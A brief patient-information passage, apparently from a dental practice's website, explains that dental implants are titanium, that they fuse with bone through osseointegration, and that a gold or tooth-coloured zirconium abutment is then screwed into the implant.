Implants are made from titanium as it is well tolerated by the body and integrates easily with bone tissue. During the placement of a dental implant, the goal is to achieve a close contact between the outer surface of the implant and the surrounding bone tissue, so they can fuse together (a process known as osseointegration) and create a stable support for the new teeth. An &#8216;abutment&#8217; or small post is then screwed into the implant. This post can be made from gold or a tooth coloured material called Zirconium (a substance also known as white steel).
